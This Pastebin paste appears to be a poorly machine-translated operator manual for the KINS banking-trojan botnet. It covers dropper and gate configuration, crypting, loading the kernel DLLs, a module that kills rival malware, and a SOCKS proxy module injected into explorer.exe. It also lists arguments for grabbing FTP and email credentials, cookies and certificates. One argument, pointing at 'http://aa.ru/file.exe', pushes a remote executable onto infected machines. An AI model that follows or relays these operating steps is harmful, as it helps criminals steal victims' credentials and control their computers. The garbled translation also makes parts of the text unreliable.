API tools faq
paste
Advertisement
Xylitol

KINS Product description

Xylitol
Sep 27th, 2013
402
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.81 KB | None | 0 0
raw download clone embed print report
  1. Product description:
  2. itur1, url2, url3 - URLs on the gate dropper ( exe file).
  3.  
  4. In addition , there are two main slashes spare in case if your domain loknut .
  5. This file should be progruzhat . It must be crypted .
  6.  
  7. delay - the delay otstuk
  8.  
  9. retry - interval core sampling bot.
  10.  
  11. buildid - the name dropper botnet .
  12.  
  13. encryption_key - encryption key.
  14.  
  15. url_server - admin Gate "B" , that is, admin core.
  16.  
  17. $ - Notifay .
  18. ! - A ban .
  19. @ - Screenshots ( full-size ) .
  20.  
  21. macros :
  22. % BOTID% - ID bot.
  23. % opensocks% - automatic opening of the socks in the transition to H HRM .
  24.  
  25. captcha_server - interception of CAPTCHA . Works with AD. Leave as is.
  26.  
  27. After collecting the config files is issued shall be issued 3 - dropper.exe, bot32.dll, bot64.dll and just as you do is file softwaregrabber.dll,
  28. which has already been assembled independently of the first three .
  29.  
  30. dropper.exe - dropper file ( 50 kb ), which pulls the core bot (2 cores , bot32.dll and bot64.dll). This file is crypted .
  31.  
  32. bot32.dll - kernel for 32-bit systems .....
  33. : > kriptovat is not necessary . Avtokript memory . The modules are the basis of the bot and are responsible for the processes of injection and grabbing a browser .
  34. bot64.dll - kernel for 64 -bit systems .....
  35.  
  36. softwaregrabber.dll - module port opening . Responsible for grabbing FTP \ Email \ pop3 \ Billing \ screen and check otstuk kernel modules. Kriptovat is not necessary . Avtokript memory .
  37.  
  38. The core of the bot. RULE OF COMMUNICATIONS AND DOWNLOADS . Pay special attention .
  39.  
  40. - Adding a file in the " Files" section. As jobs are added files bot32.dll, bot64.dll, softwaregrabber.dll and other modules , including third-party dll or exe files .
  41. Name and version selected as desired. Bot communicates with the modules Zutick, Shylock, SpyEye, but without an open API ( optional) argument to leave empty.
  42. Attention ! Communication with the module . First, load the kernel modules . In this case, the kernel modules should not be linked to anything . Next, load the module softwaregrabber.dll,
  43. that should be associated with bot32.dll
  44.  
  45. - Give the job to the modules in the " job ." It should be noted key points :
  46. a) To select the kernel module loading mode " reusable "
  47. Module softwaregrabber - " one-off " or " reusable " .
  48. b) Number of times (performance ) put a big number, eg 9999999 .
  49.  
  50. - Quest " written in the config ", " input commands manually " are available only when you open API. Setting the "send logs " is available only for debug version,
  51. which is done by request and in extreme cases. In this case, the installation logs dropper and obtaining rights go to the " logs " .
  52.  
  53. - Net \ dirty - a necessary attribute if you decide to download the bots in one hand.
  54.  
  55. - Updating the dll is on the circuit i +1 preserving the bot name in the files and assignments , if necessary update of sequence, and the scheme i, if the update
  56. comes after the reboot .
  57.  
  58. - To update the statistics in the admin dropper , do not forget to add the task to CZK .
  59.  
  60. - The difference between the admin area "A" and "B" indicates the quality of your traffic. Cores bot ticking only after obtaining logs . In case
  61. progruzhaetya kernel , say, Dedic , where there is no activity , the bot will appear in the admin "B" , but did not appear in the admin area "A".
  62. You can always see the number of loaded cores bot in the " jobs " in the admin dropper . The difference in bad trafe may reach 90 %
  63. we only show the balance of objective things.
  64. The module mod-killer is designed to maintain the purity of your bots from third-party bots , unwanted software .
  65. - Deleting Citadel (all), Zeus (all), SpyEye (all), IceIX (all), Evolution (all) and their derivatives , Carberp ( exception - bootkit )
  66. Zutick, Lickat, Shylock, Gazavat (Sality).
  67. - Delete a third-party malicious software, such as loaders , Rata , DDoS bots , based on heuristic analysis.
  68. - Removal of unwanted software, such as click bots , bots spoofing issue , based on the heuristic analysis.
  69. - Removal of the common bots even crypted form on the basis of signatures.
  70. - Total integration with neural network bot. Analysis of unsigned software , processes, without windows, etc.
  71.  
  72. Installation Options :
  73. Specify the arguments (arguments SpyEye in the admin core)
  74. "77_uninstall;" - the removal of unwanted software , such as a boat- clickers , etc.
  75. "77_replace_with = http://aa.ru/file.exe" ( if you have the software to progruz , but competitors will ship similar software on your bot ) swings on a new boat with RLS imunnitetom to deliteru - 77_uninstall
  76. "Report;" - bug report in the admin area of the nucleus.
  77. "Clean_zeus_based;" - delete all versions of popular signature-based bots .
  78. The record of a line of several arguments. Each argument must end with "" .
  79. Load module files , add to the value associated with the core bot32.dll
  80.  
  81. In order to use the module socks , do the transaction :
  82. 1 ) Find a server, it is desirable to Windows ( you can Dedicated Server with installed apache / nginx / xamp / denwer, in general, need a server
  83. with installed php). Nix on Vine also supposed to work .
  84. 2) Fill socks_server folder on the server , we put all the 777 law.
  85. 3) Take gate.php link to the file on the server, remember .
  86. 4 ) Go to the admin panel dropper , add -ins and socks5Server32.dll socks5Server64.dll, in the arguments indicate the link from paragraph 3 ) .
  87. Where to inject - explorer.exe.
  88. 5 ) Sox as IP: Port take in going to the link " your_server " / control.php, either from the log.txt
  89. Sometimes we clean konnekshn we click in Kill Tasks. The terminal supports the socks fourth and fifth versions of standard rfc.
  90. Authorization is not required. Volnovatsya about ports for bots do not need , they will take out of the gate .
  91. WARNING ! The module must be connected to the core bot32.dll for socks5Server32.dll and bot64.dll c socks5Server64.dll respectively.
  92. Attention ! In the tasks and files names must be exactly socks5Server32.dll and socks5Server64.dll
  93. Auto open socks carried out on the macro / /% opensocks% in inzhekta .
  94.  
  95. The module is designed for grabbing softwaregrabber FTP , email , pop3 data and certificates.
  96. The module is integrated with a common neural network is bot base module to the kernel .
  97.  
  98. Installation Options :
  99. Specify the arguments (arguments SpyEye in the admin core)
  100. "Grab_all;" - Rob everything - all FTP data that are recorded by a list of all email-i + contacts uchetka ,
  101. Cookies IE and FF ( after sending the admin area as possible are removed ) , and certificates MY store ( exported to the admin certificates
  102. under the password "GCert")
  103. "Grab_emails;" - grabbing only the email adresses .
  104. "Grab_ftps;" - grabbing only FTP .
  105. "Grab_certs;" - grabbing only certificates.
  106. "Grab_sol;" - salt- grabbing cookies .
  107. The record of a line of several arguments. Each argument must end with "" .
  108. Load module files , add to the value associated with the core bot32.dll
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!